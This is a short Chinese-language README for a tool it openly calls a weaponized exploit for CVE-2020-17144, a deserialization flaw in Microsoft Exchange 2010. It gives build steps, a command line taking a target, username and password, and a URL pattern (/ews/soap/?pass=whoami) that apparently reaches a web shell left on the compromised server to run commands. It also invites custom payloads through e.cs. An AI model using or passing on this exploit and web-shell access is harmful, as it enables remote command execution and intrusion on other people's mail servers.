CVE-2020-17144 的武器化利用工具(Microsoft Exchange 2010 MRM.AutoTag.Model 不安全反序列化漏洞)
构建
首先安装 .net framework 3.5,然后执行 make。
用法
CVE-2020-17144 <target> <user> <pass>
利用成功后,访问 http://[target]/ews/soap/?pass=whoami 即可获得命令执行。

你也可以将 e.cs 修改为自定义 exp。
更多信息请阅读我的博客文章(中文)。